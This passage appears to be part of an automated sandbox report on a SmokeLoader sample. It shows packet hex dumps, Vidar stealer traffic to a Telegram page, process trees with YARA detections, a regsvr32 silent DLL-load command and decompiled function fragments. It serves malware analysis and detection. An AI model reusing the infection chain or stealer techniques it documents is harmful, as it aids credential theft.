Data Ascii: wGL9r{lmGNz>\0b!)MWT0Hc R@r;T!2_cCP/,rYEU5U,uN`Je/O$XhlXW^OICf\wE&d&}ap`L_A>v]Vmb);,>LE<rJ#T]-
2022-06-29 21:11:52 UTC	257	IN	Data Raw: 47 24 66 f5 a7 c7 7b 84 6e e9 47 f0 3a 0c f7 28 d8 7f 57 a1 33 da c6 6c 81 e1 c0 31 5f ea d9 46 c1 58 1f 5e 04 d9 dd ab f1 a9 d2 d4 df 95 70 46 92 35 a7 ae 83 e5 b4 f9 da 4c ac 33 b0 67 c7 8f cd 80 66 06 99 1e 42 61 ea a7 0f bb 54 df 39 64 ac c2 d0 fd f9 0e 99 3a 28 eb 71 ca 43 8d 65 49 d2 61 87 95 42 a3 5c 81 5a e3 ca 40 6b 36 bc 04 1f 45 0c 86 23 ac a2 63 8a 68 a3 a6 c2 2a 7a e3 a6 03 21 70 ab b8 21 91 4a 2f 01 47 11 a5 e6 bb ad 24 38 23 fe 82 39 f2 8b b2 ed 93 dd 64 60 53 6f a6 f4 14 61 00 a8 1f da 64 ce 32 44 81 bf 5d 0e 59 f8 40 98 a2 77 33 f6 e3 c8 cc 32 1f 31 e1 ff 2e 16 97 3a f1 d2 af 2b 30 56 e9 db 38 06 2d 21 41 79 e8 36 c0 e6 e6 86 cd 23 51 03 bf 39 a6 d9 78 82 62 3d ee d9 52 e9 78 6a dc 3c c2 e6 51 1f 83 45 52 38 97 b8 21 1b 64 ed 7f 7f 72 95 Data Ascii: G$f{nG:(W3l1_FX^pF5L3gfBaT9d:(qCeIaB\Z@k6E#ch*z!p!J/G$8#9d`Soad2D]Y@w321.:+0V8-!Ay6#Q9xb=Rxj<QER8!dr
2022-06-29 21:11:52 UTC	272	IN	Data Raw: c9 d0 81 b2 c7 d9 7c b1 c1 d4 81 aa bd d8 80 a7 ba cf 85 a0 b3 d5 81 a0 c9 dc 59 84 7d ca 61 7f 7e d2 62 7c 82 84 8d c8 a7 53 8d bd a7 4e 8c af 90 2f 82 a5 aa 28 82 91 9a 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 84 83 c6 90 96 95 d8 d0 d4 d9 d4 d4 d9 ce cd be d8 c5 cc cd cb c5 d4 bd c3 cb d8 c4 d7 be d1 c5 cd c8 cf c6 ce be d6 bc ce cd d5 bb d9 c7 d3 c0 d5 c0 d0 c4 ce c3 ce b5 dc bf d5 c1 d4 c2 da c3 d0 ba ce ca cd c5 d4 c3 c5 c5 d5 c1 c8 c3 d0 7b 81 7b d8 7e 84 84 d1 a3 ad a7 d1 ac a5 ad d2 b4 b1 aa d6 7e 80 88 cd 65 82 84 ca 6d 7c 7e c7 85 ae b5 d5 82 bd be ce 84 ae c0 cb 81 b7 be d0 7c af c6 d3 84 a9 c7 cf 80 a5 c7 d3 80 a9 c8 cd 7b 9d c3 d9 5e 83 83 d4 5c 81 7d d2 61 7f 7d 82 94 c2 9f 4e 86 98 9d 32 7f a7 b2 2b 7c a1 a1 2d 00 00 00 00 00 Data Ascii: \|Y}a~b\|SN/({{~~em\|~\|{^\}a}N2+\|-

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49789	149.154.167.99	443	C:\Users\user\AppData\Local\Temp\7791.exe

Timestamp	kBytes transferred	Direction	Data
2022-06-29 21:12:20 UTC	281	OUT	GET /ch_inagroup HTTP/1.1 Host: t.me
2022-06-29 21:12:20 UTC	281	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 29 Jun 2022 21:12:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9553 Connection: close Set-Cookie: stel_ssid=c30a538ac1d6ce50aa_2699081739948562307; expires=Thu, 30 Jun 2022 21:12:20 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=35768000
2022-06-29 21:12:20 UTC	282	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 63 68 5f 69 6e 61 67 72 6f 75 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 63 68 5f 69 6e 61 67 72 6f 75 70 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @ch_inagroup</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="ch_inagroup"><meta property="o

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: hOdgEiePTe.exePID: 6352, Parent PID: 1280

General

Target ID:	0
Start time:	23:10:18
Start date:	29/06/2022
Path:	C:\Users\user\Desktop\hOdgEiePTe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hOdgEiePTe.exe"
Imagebase:	0x400000
File size:	289792 bytes
MD5 hash:	F3AF35C6E121FF8FE96B0794E6F72D6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.335353490.0000000000610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.335418387.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3968, Parent PID: 6352

General

Target ID:	2
Start time:	23:10:28
Start date:	29/06/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6b8cf0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.317713525.0000000002851000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: hcthhbiPID: 6328, Parent PID: 848

General

Target ID:	13
Start time:	23:11:06
Start date:	29/06/2022
Path:	C:\Users\user\AppData\Roaming\hcthhbi
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\hcthhbi
Imagebase:	0x400000
File size:	289792 bytes
MD5 hash:	F3AF35C6E121FF8FE96B0794E6F72D6B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.382652287.00000000004C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.382836184.0000000002131000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 900B.exePID: 3076, Parent PID: 3968

General

Target ID:	22
Start time:	23:11:53
Start date:	29/06/2022
Path:	C:\Users\user\AppData\Local\Temp\900B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\900B.exe
Imagebase:	0x7ff638ba0000
File size:	287744 bytes
MD5 hash:	E1806DF573470FC02E4271A8AA1E9D95
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.485561355.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000016.00000002.486664675.0000000000D41000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 412, Parent PID: 3968

General

Target ID:	26
Start time:	23:12:03
Start date:	29/06/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32 /s C:\Users\user\AppData\Local\Temp\5D03.dll
Imagebase:	0x7ff64d4f0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5984, Parent PID: 412

General

Target ID:	27
Start time:	23:12:04
Start date:	29/06/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	/s C:\Users\user\AppData\Local\Temp\5D03.dll
Imagebase:	0xa10000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: 7791.exePID: 1824, Parent PID: 3968

General

Target ID:	29
Start time:	23:12:11
Start date:	29/06/2022
Path:	C:\Users\user\AppData\Local\Temp\7791.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\7791.exe
Imagebase:	0x400000
File size:	402944 bytes
MD5 hash:	5AD1BEF6F9DF3C527F7217DCCD26C2D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001D.00000003.515106259.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001D.00000002.648449578.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.535729993.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001D.00000002.535099899.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: hOdgEiePTe.exePID: 6352, Parent PID: 1280COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	12.2%
Signature Coverage:	5.6%
Total number of Nodes:	320
Total number of Limit Nodes:	27

Executed Functions

Function 004017E2 Relevance: 3.1, APIs: 2, Instructions: 53
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004017E2(void* __edx) {
				void* _t4;

				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
			}

0x004017e2

APIs

Sleep.KERNELBASE(00001388), ref: 00401823
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040184B

Memory Dump Source

Source File: 00000000.00000002.335029568.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hOdgEiePTe.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 4dede37128b39f4f7e7a4df5dc33f26b0f76fbcd4aaa8ffb007c11c557e31b11
Instruction ID: ddaf0562df841adfab300f0276baae716c17d25714fd681a3a6e16616d485b4c
Opcode Fuzzy Hash: 4dede37128b39f4f7e7a4df5dc33f26b0f76fbcd4aaa8ffb007c11c557e31b11
Instruction Fuzzy Hash: EC015233148208EBDB017AA59C41DA97729AB45754F30C537FA03791F1D67D8713A72B

Uniqueness

Uniqueness Score: -1.00%

Function 004017E3 Relevance: 3.1, APIs: 2, Instructions: 53
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E004017E3(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t8;
				char* _t9;
				void* _t11;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;
				void* _t24;
				void* _t26;

				_push(0x181b);
				_t8 =  *_t21;
				_t22 = _t21 + 4;
				L00401118(_t8, _t13, 0x61, _t19, _t20, _t24);
				_t14 = _a4;
				Sleep(0x1388);
				_t3 =  &_v8; // 0x1b68f34d
				_t9 = _t3;
				_push(_t9);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				L00401360(); // executed
				_t25 = _t9;
				if(_t9 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t9);
					_push(_t14); // executed
					E00401432(_t14, _t17, _t18, _t19, _t26); // executed
				}
				 *_t14(0xffffffff, 0); // executed
				_t11 = 0x181b;
				_push(0x61);
				_t16 =  *_t22;
				L00401118(_t11, _t14, _t16, _t19, _t20, _t25);
				return _t11;
			}

0x004017f1
0x004017f6
0x004017f9
0x00401816
0x0040181b
0x00401823
0x00401826
0x00401826
0x00401829
0x0040182a
0x0040182d
0x00401830
0x00401831
0x00401836
0x00401838
0x0040183a
0x0040183d
0x00401840
0x00401841
0x00401842
0x00401842
0x0040184b
0x00401858
0x00401868
0x0040186a
0x00401877
0x00401880

APIs

Sleep.KERNELBASE(00001388), ref: 00401823
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040184B

Memory Dump Source

Source File: 00000000.00000002.335029568.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hOdgEiePTe.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: eed50f69cd3fa7174ad76653e673f5296f9ebb16c169d6494c900a5425ffe511
Instruction ID: 1d0556d2ce3487287f662705d53e2785c513140bae9e3f24436a296874fe77da
Opcode Fuzzy Hash: eed50f69cd3fa7174ad76653e673f5296f9ebb16c169d6494c900a5425ffe511
Instruction Fuzzy Hash: 15017533108208F7D7017A958C42DAA3628AB45754F30C437BA03790F1D57DDB12676B

Uniqueness

Uniqueness Score: -1.00%

Function 004017EE Relevance: 3.0, APIs: 2, Instructions: 47
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E004017EE(void* __edi, void* __esi) {
				intOrPtr _t8;
				intOrPtr* _t9;
				void* _t11;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t25;
				intOrPtr* _t26;
				void* _t29;
				void* _t31;

				_t21 = __esi;
				_t19 = __edi;
				_push(0x181b);
				_t8 =  *_t25;
				_t26 = _t25 + 4;
				L00401118(_t8, _t13, 0x61, __esi, 0x1b68f351, _t29);
				_t14 =  *((intOrPtr*)(0x1b68f359));
				Sleep(0x1388);
				_t9 = 0x1b68f34d;
				_push(_t9);
				_push( *0x1B68F361);
				_push( *0x1B68F35D);
				_push(_t14); // executed
				L00401360(); // executed
				_t30 = _t9;
				if(_t9 != 0) {
					_push( *0x1B68F365);
					_push( *((intOrPtr*)(0x1b68f34d)));
					_push(_t9);
					_push(_t14); // executed
					E00401432(_t14, _t18, _t19, _t21, _t31); // executed
				}
				 *_t14(0xffffffff, 0); // executed
				_t11 = 0x181b;
				_push(0x61);
				_t17 =  *_t26;
				L00401118(_t11, _t14, _t17, _t21, 0x1b68f351, _t30);
				return _t11;
			}

0x004017ee
0x004017ee
0x004017f1
0x004017f6
0x004017f9
0x00401816
0x0040181b
0x00401823
0x00401826
0x00401829
0x0040182a
0x0040182d
0x00401830
0x00401831
0x00401836
0x00401838
0x0040183a
0x0040183d
0x00401840
0x00401841
0x00401842
0x00401842
0x0040184b
0x00401858
0x00401868
0x0040186a
0x00401877
0x00401880

APIs

Sleep.KERNELBASE(00001388), ref: 00401823
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040184B

Memory Dump Source

Source File: 00000000.00000002.335029568.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hOdgEiePTe.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0a9656e0e1b5f21b45c9f82a7808bfe019579950b80e51e68eaabb0023cd3f01
Instruction ID: 6a2648c31bf342f80e2744bc490c75df06b0a743f4722301b2fbabc3dba0a0aa
Opcode Fuzzy Hash: 0a9656e0e1b5f21b45c9f82a7808bfe019579950b80e51e68eaabb0023cd3f01
Instruction Fuzzy Hash: 54016733508304ABDB017AA18C42EA937289B45754F24C577BB13790F2D57DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 007864F7 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0078651F
Module32First.KERNEL32(00000000,00000224), ref: 0078653F

Memory Dump Source

Source File: 00000000.00000002.335529024.0000000000781000.00000040.00000020.00020000.00000000.sdmp, Offset: 00781000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_781000_hOdgEiePTe.jbxd

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: cd05262f7d295ef15ec3bcf8b6e561412fc9f15fd3b77a966d305672c0a23eb2
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: FBF0F072640310BBD7203BF8A88DB6E72ECAF49B24F100628E643910C1DB78EC458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00401807 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 24%

			E00401807(signed int __edx, void* __edi, void* __esi) {
				void* _t9;
				void* _t10;
				void* _t12;
				void* _t14;
				intOrPtr* _t15;
				intOrPtr _t18;
				void* _t21;
				void* _t25;
				intOrPtr* _t27;
				signed char _t30;
				void* _t32;

				_t23 = __esi;
				_t21 = __edi;
				_t20 = __edx |  *(_t25 + 0x7b);
				_t30 = __edx |  *(_t25 + 0x7b);
				L00401118(_t9, _t14, 0x61, __esi, _t25, _t30);
				_t15 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t4 = _t25 - 4; // 0x1b68f34d
				_t10 = _t4;
				_push(_t10);
				_push( *((intOrPtr*)(_t25 + 0x10)));
				_push( *((intOrPtr*)(_t25 + 0xc)));
				_push(_t15); // executed
				L00401360(); // executed
				_t31 = _t10;
				if(_t10 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t10);
					_push(_t15); // executed
					E00401432(_t15, _t20, _t21, _t23, _t32); // executed
				}
				 *_t15(0xffffffff, 0); // executed
				_t12 = 0x181b;
				_push(0x61);
				_t18 =  *_t27;
				L00401118(_t12, _t15, _t18, _t23, _t25, _t31);
				return _t12;
			}

0x00401807
0x00401807
0x00401807
0x00401807
0x00401816
0x0040181b
0x00401823
0x00401826
0x00401826
0x00401829
0x0040182a
0x0040182d
0x00401830
0x00401831
0x00401836
0x00401838
0x0040183a
0x0040183d
0x00401840
0x00401841
0x00401842
0x00401842
0x0040184b
0x00401858
0x00401868
0x0040186a
0x00401877
0x00401880

APIs

Sleep.KERNELBASE(00001388), ref: 00401823
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040184B

Memory Dump Source

Source File: 00000000.00000002.335029568.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hOdgEiePTe.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: fa61b3bfe6e1efcc42a3172324d87a3747898b17389843dd474e8030b106d628
Instruction ID: d1e85a843a3bf15b3ffbd62fd2fe31d474754e63a526ee7ed21e8696c92682af
Opcode Fuzzy Hash: fa61b3bfe6e1efcc42a3172324d87a3747898b17389843dd474e8030b106d628
Instruction Fuzzy Hash: 2FF04F33204208FBDB007BA18C42EAD3729AB45754F20C537BA13790F2D679CA12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1B0 Relevance: 22.6, APIs: 15, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_check_managed_app.LIBCMTD ref: 0040A22C
__heap_init.LIBCMTD ref: 0040A236

Part of subcall function 004148F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040A23B,00000001), ref: 00414906

_fast_error_exit.LIBCMTD ref: 0040A244

Part of subcall function 0040A390: __FF_MSGBANNER.LIBCMTD ref: 0040A39E
Part of subcall function 0040A390: __NMSG_WRITE.LIBCMTD ref: 0040A3A7
Part of subcall function 0040A390: ___crtExitProcess.LIBCMTD ref: 0040A3B4

__mtinit.LIBCMTD ref: 0040A24C
_fast_error_exit.LIBCMTD ref: 0040A257
__RTC_Initialize.LIBCMTD ref: 0040A269
__amsg_exit.LIBCMTD ref: 0040A280
___crtGetEnvironmentStringsW.LIBCMTD ref: 0040A292
___wsetargv.LIBCMTD ref: 0040A29C
__amsg_exit.LIBCMTD ref: 0040A2A7
__wsetenvp.LIBCMTD ref: 0040A2AF
__amsg_exit.LIBCMTD ref: 0040A2BA
__cinit.LIBCMTD ref: 0040A2C4
__amsg_exit.LIBCMTD ref: 0040A2D9
__wwincmdln.LIBCMTD ref: 0040A2E1

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 107975891-0
Opcode ID: 272870e4d19c1bf85681b7abbf57ebcc6f131eb25805d94ca0531674ec928549
Instruction ID: 450b732e2b9114f1f527be54288a7872bfad2b2da338752ff4d5799d0543e86e
Opcode Fuzzy Hash: 272870e4d19c1bf85681b7abbf57ebcc6f131eb25805d94ca0531674ec928549
Instruction Fuzzy Hash: AF41A7B1E003089BDB10EBF2AC42B9E76B4AB54718F10413FE915B72C2E77D95518B9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A225 Relevance: 22.6, APIs: 15, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_check_managed_app.LIBCMTD ref: 0040A22C
__heap_init.LIBCMTD ref: 0040A236

Part of subcall function 004148F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040A23B,00000001), ref: 00414906

_fast_error_exit.LIBCMTD ref: 0040A244

Part of subcall function 0040A390: __FF_MSGBANNER.LIBCMTD ref: 0040A39E
Part of subcall function 0040A390: __NMSG_WRITE.LIBCMTD ref: 0040A3A7
Part of subcall function 0040A390: ___crtExitProcess.LIBCMTD ref: 0040A3B4

__mtinit.LIBCMTD ref: 0040A24C
_fast_error_exit.LIBCMTD ref: 0040A257
__RTC_Initialize.LIBCMTD ref: 0040A269
__amsg_exit.LIBCMTD ref: 0040A280
___crtGetEnvironmentStringsW.LIBCMTD ref: 0040A292
___wsetargv.LIBCMTD ref: 0040A29C
__amsg_exit.LIBCMTD ref: 0040A2A7
__wsetenvp.LIBCMTD ref: 0040A2AF
__amsg_exit.LIBCMTD ref: 0040A2BA
__cinit.LIBCMTD ref: 0040A2C4
__amsg_exit.LIBCMTD ref: 0040A2D9
__wwincmdln.LIBCMTD ref: 0040A2E1

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 107975891-0
Opcode ID: 002a1133fc2b2b890052d7194be57757f7404e523265611f7d27079dde27a561
Instruction ID: 7b563e03f9839307d37471739d09da52e36f4287aad92d161d43c72ba5477245
Opcode Fuzzy Hash: 002a1133fc2b2b890052d7194be57757f7404e523265611f7d27079dde27a561
Instruction Fuzzy Hash: 3F3145F5E403089AEB10FBF2A84279E7260AB5070CF10417FE9157A2C3F67995518A9B

Uniqueness

Uniqueness Score: -1.00%

Function 00425234 Relevance: 17.2, APIs: 11, Instructions: 689
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vswprintf.LIBCMTD ref: 00425259

Part of subcall function 00409310: __vsprintf_l.LIBCMTD ref: 00409323

_wprintf.LIBCMTD ref: 00425267

Part of subcall function 004095D0: __errno.LIBCMTD ref: 00409638
Part of subcall function 004095D0: __invalid_parameter.LIBCMTD ref: 00409656

Part of subcall function 00424700: __wremove.LIBCMTD ref: 00424709

_puts.LIBCMTD ref: 00425276

Part of subcall function 00409E30: __errno.LIBCMTD ref: 00409E9F
Part of subcall function 00409E30: __invalid_parameter.LIBCMTD ref: 00409EBD

_realloc.LIBCMTD ref: 00425293

Part of subcall function 00409E00: __realloc_dbg.LIBCMTD ref: 00409E14

_realloc.LIBCMTD ref: 0042529A

Part of subcall function 00409570: __nh_malloc_dbg.LIBCMTD ref: 00409584

_realloc.LIBCMTD ref: 004252B8
_malloc.LIBCMTD ref: 004252BE

Part of subcall function 004095A0: __nh_malloc_dbg.LIBCMTD ref: 004095B6

_ferror.LIBCMTD ref: 004252C7

Part of subcall function 00409D80: __errno.LIBCMTD ref: 00409DBC
Part of subcall function 00409D80: __invalid_parameter.LIBCMTD ref: 00409DDA

_wctomb_s.LIBCMTD ref: 004252D1
__wcstoi64_l.LIBCMTD ref: 004252DA

Part of subcall function 00409C60: strtoxl.LIBCMTD ref: 00409C77

Part of subcall function 00409530: __wcstoi64.LIBCMTD ref: 0040953D

VirtualProtect.KERNELBASE(00000040,0040A315,?,?,?,?,0040A315), ref: 00425845

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __errno__invalid_parameter_realloc$__nh_malloc_dbg$ProtectVirtual__realloc_dbg__vsprintf_l__vswprintf__wcstoi64__wcstoi64_l__wremove_ferror_malloc_puts_wctomb_s_wprintfstrtoxl
String ID:
API String ID: 2721630819-0
Opcode ID: 1c6d2cc978b886943a7379dbea215e1493315876cf010c28f08f4717cb5a734f
Instruction ID: 262d938b3f2657f6b2729647e496189a92effcfd73030ebb47c606ffad63313f
Opcode Fuzzy Hash: 1c6d2cc978b886943a7379dbea215e1493315876cf010c28f08f4717cb5a734f
Instruction Fuzzy Hash: 9D12FD76402665BBC321ABA2AE4CDDF7F6CEF4A355B004429F249A1071DB384645CBFE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7D7 Relevance: 7.8, APIs: 5, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CrtCheckMemory.LIBCMTD ref: 0040A7FA
__heap_alloc_base.LIBCMTD ref: 0040A981
_memset.LIBCMT ref: 0040AAC9
_memset.LIBCMT ref: 0040AAE6
_memset.LIBCMT ref: 0040AB01

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: _memset$CheckMemory__heap_alloc_base
String ID:
API String ID: 4254127243-0
Opcode ID: 11eca94a8210f7604d88c04e653745cf2f4ac7acd2143cfb64189b18e176aca7
Instruction ID: 8003a8bbdeb607fcfd29952dfd3ff738216c5421a97bed0ec34fcd63fd707b77
Opcode Fuzzy Hash: 11eca94a8210f7604d88c04e653745cf2f4ac7acd2143cfb64189b18e176aca7
